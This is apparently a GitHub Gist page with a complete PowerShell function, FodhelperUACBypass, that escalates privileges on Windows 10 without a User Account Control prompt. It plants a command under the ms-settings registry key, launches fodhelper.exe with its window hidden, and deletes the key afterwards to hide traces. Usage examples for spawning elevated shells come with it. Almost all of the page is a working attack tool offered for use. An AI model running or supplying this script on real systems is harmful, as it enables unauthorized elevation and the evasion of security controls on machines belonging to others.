Skip to content

Instantly share code, notes, and snippets.

What would you like to do?
Bypass UAC via Fodhelper binary in Windows 10 systems
This script can bypass User Access Control (UAC) via fodhelper.exe
It creates a new registry structure in: "HKCU:\Software\Classes\ms-settings\" to perform UAC bypass and starts
an elevated command prompt.
Function : FodhelperUACBypass
File Name : FodhelperUACBypass.ps1
Author : netbiosX. -
Load "cmd /c start C:\Windows\System32\cmd.exe" (it's default):
Load specific application:
FodhelperUACBypass -program "cmd.exe"
FodhelperUACBypass -program "cmd.exe /c powershell.exe" 
function FodhelperUACBypass(){
Param (
[String]$program = "cmd /c start C:\Windows\System32\cmd.exe" #default
#Create Registry Structure
New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value $program -Force
#Start fodhelper.exe
Start-Process "C:\Windows\System32\fodhelper.exe" -WindowStyle Hidden
Start-Sleep 3
Remove-Item "HKCU:\Software\Classes\ms-settings\" -Recurse -Force
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.